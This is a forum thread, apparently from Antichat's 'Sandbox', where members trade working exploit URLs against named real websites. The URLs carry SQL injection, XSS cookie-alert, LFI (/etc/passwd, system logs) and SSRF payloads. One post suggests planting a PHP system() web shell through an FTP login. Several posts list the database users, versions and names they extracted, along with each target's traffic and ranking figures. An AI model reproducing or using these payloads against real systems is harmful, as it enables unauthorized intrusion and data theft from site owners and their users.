SQLi, XSS and other vulnerabilities.

Discussion in 'Sandbox' started by Егорыч+++, 10 May 2015.

  1. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    189
    Reputations:
    57
    Code:
    http://ankontr.if.ua/?a_id=6395&page=../../../../../../var/log/lastlog�
    http://ankontr.if.ua/?a_id=6395&page=../../../../../var/run/utmp�
    http://ankontr.if.ua/?a_id=6395&page=../../../../../var/log/wtmp� -- this one records the login and IP and mentions ftpd. It is worth trying to connect via ftpd and, as the login, trying to specify <?php system($_REQUEST['cmd'])?>.
    http://ankontr.if.ua/?a_id=6395&page=../../../../../var/log/xferlog� - a fairly large log. Google says this is the vsftpd server's log
    
     
    #81 Mister_Bert0ni, 31 May 2015
    Last edited: 31 May 2015
  2. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS
    Code:
    http://24log.ru/join.php?c=4&d=6&project_id=&register=yes&sth=0&t=41-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt
     
  3. Babadyc

    Babadyc New Member

    Joined:
    9 May 2015
    Messages:
    25
    Likes Received:
    3
    Reputations:
    6
    more

    dbo464376343@74.208.16.31
    5.1.73-log

    Code:
    http://www.southernpowerlifting.com/form.php?id=-1+union+select+group_concat(table_name),2+from+information_schema.tables—+
     
  4. Filipp

    Filipp Member

    XSS
    Code:
    http://russki-mat.net/argot/poisk.php?c=lem&q=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28123%29%3C/ScRiPt%3E
     
  5. Filipp

    Filipp Member

    SQL-inj (Error Based)
    Banner: '5.1.41-log'
    Code:
    http://viko-ias.ru/o_kompanii/novosti/?ajax=1&tag=-5118%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x71706b7a71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x7162627071%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(78)%2cCHAR(121)%2cCHAR(78)%2cCHAR(107)%2cCHAR(103)%2cCHAR(54)%2cCHAR(66)%2cCHAR(57))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)2))x%20from%20information_schema.tables%20group%20by%20x)a)and%22
     
  6. Filipp

    Filipp Member

    XSS:
    Code:
    http://telenet.dn.ua/check/index.php/%22%3E%3Cscript%3Ealert%28%22Filipp%20Mustang%22%29%3C/script%3E
     
  7. Filipp

    Filipp Member

    LFI:
    Code:
    http://krivbassham.org.ua/index.php?action=views&getbg=../../../../../../../../../../etc/passwd&page=blogs
    XSS:
    Code:
    http://iona.kiev.ua/photo.php?menu=misc%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&photo=troitsa1520.jpg
     
    #88 Filipp, 3 Jun 2015
    Last edited by a moderator: 4 Jun 2015
  8. Filipp

    Filipp Member

    SQL-inj (Blind)
    Code:
    http://gothart.com.ua/stat/book/show/?id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Cdxh)
     
  9. Bris

    Bris Banned

    Joined:
    2 Jun 2015
    Messages:
    5
    Likes Received:
    2
    Reputations:
    1
    www.tacamateurs.com

    Code:
    http://www.tacamateurs.com/cgi-bin/signup/signup3.pl?famaction=form&network=TAC1&tacid=221%27+and(select+1+from(select+count(*),concat((select+(select+database())+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+%271%27=%271
    
     
  10. Filipp

    Filipp Member

    SSRF:
    Code:
    http://fcgoverla.uz.ua/lib/imageresize.php?cache=1&h=375&imgurl=ftp://test.antichat/image.ssrf&w=500
     
  11. Rosso

    Rosso New Member

    Joined:
    23 May 2015
    Messages:
    6
    Likes Received:
    3
    Reputations:
    5
    Code:
    http://dazo.gov.ua/index.php?id=query&sid=-15 union select concat(0x3c623e3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3e3e496e6a65637420627920526f73736f203c3c,0x3c62723e,0x3c2f623e3c2f666f6e743e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database())--+
    User: dazo_yura@localhost
    Version: 5.5.41-0ubuntu0.14.04.1
    Database: dazo_dazo
    TIC: 20
    PR: 4
     
  12. Bris

    Bris Banned

    www.the-ice-man.co.uk
    Code:
    http://www.the-ice-man.co.uk/prodisp.php?prodcatind=1&subcatind=1&pageind=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a,version(),database(),user(),@@version _compile_os),16+--+
    4.1.22-standard:theqice_manicefruit:theqice@localhost: pc-linux-gnu
    
    Table prefix: 'theqice_'
    inurl:"prodisp.php?prodcatind"

    I don't quite get it, have they already fixed it or what? ;/
     
    #93 Bris, 7 Jun 2015
    Last edited: 7 Jun 2015
  13. Filipp

    Filipp Member

    SQL-inj
    Code:
    http://chorus.kh.ua/album.php?id=-1+UNION+SELECT+1,user(),3+--+
     
    #94 Filipp, 11 Jun 2015
    Last edited: 11 Jun 2015
    yarbabin likes this.
  14. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    43
    Likes Received:
    4
    Reputations:
    7
    Code:
    http://www.ruslang.ru/agens.php?id=999999.9'+union+all+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8+--+
    TIC 1400
    PR 5
    5.5.41-MariaDB

    Code:
    http://www.komod.ru/garniture/search/?query=99'+or+1=(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,dAtAbAsE(),0x217e21,vErSiOn(),0x217e21,uSeR(),0x217e21))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+and+'1'='1
    TIC 900
    PR 3
    Li 6k traffic
    5.6.15-63.0-log

    Code:
    http://dynatone.ru/newslist.php?ngr=2'+and(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,dAtAbAsE(),0x217e21,vErSiOn(),0x217e21,uSeR(),0x217e21))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+and+'1'='1
    TIC 1700
    PR 3
    Li 3k traffic
    5.1.63-0+squeeze1


    Code:
    http://www.auto-magnitola.ru/auto/index.php?firma=9'+union+all+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,NULL,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+

    TIC 450
    PR 4
    Alexa 300k
    5.5.33-log
    Li 5k traffic
    Code:
    domkom.ru/admin/stuffs_add.php?id_type=7'+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6+--+
    TIC 275
    PR 3

    5.6.15-63.0-log

     
    #95 nikonic, 11 Jun 2015
    Last edited by a moderator: 11 Jun 2015
    BigBear likes this.
  15. nikonic

    nikonic New Member

    Code:
    http://www.province.ru/doska/ind.php?id_typ=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
    CMS: Joomla
    TIC 1900
    PR 5
    LI fluctuates, but mostly 20k unique visitors per day

    5.1.49-3
     
  16. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
  17. Take_IT

    Take_IT Banned

    Joined:
    11 Mar 2013
    Messages:
    381
    Likes Received:
    162
    Reputations:
    267
    In my opinion, those who have long been able to post vulnerabilities in the dedicated threads pinned in the specialized sections should be forbidden from posting them here
    maybe you've already outgrown the sandbox??
     
    BigBear and yarbabin like this.
  18. Take_IT

    Take_IT Banned

    in the file you downloaded:
    1) in the file name 5.1.23-rc-community-log.txt
    2) a disclosure error in the text of the file
     
  19. Filipp

    Filipp Member

    XSS:
    Code:
    http://www.62.ua/banks/type/1?bank_id=1&income_statement=1&sum=10000%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&term=1
     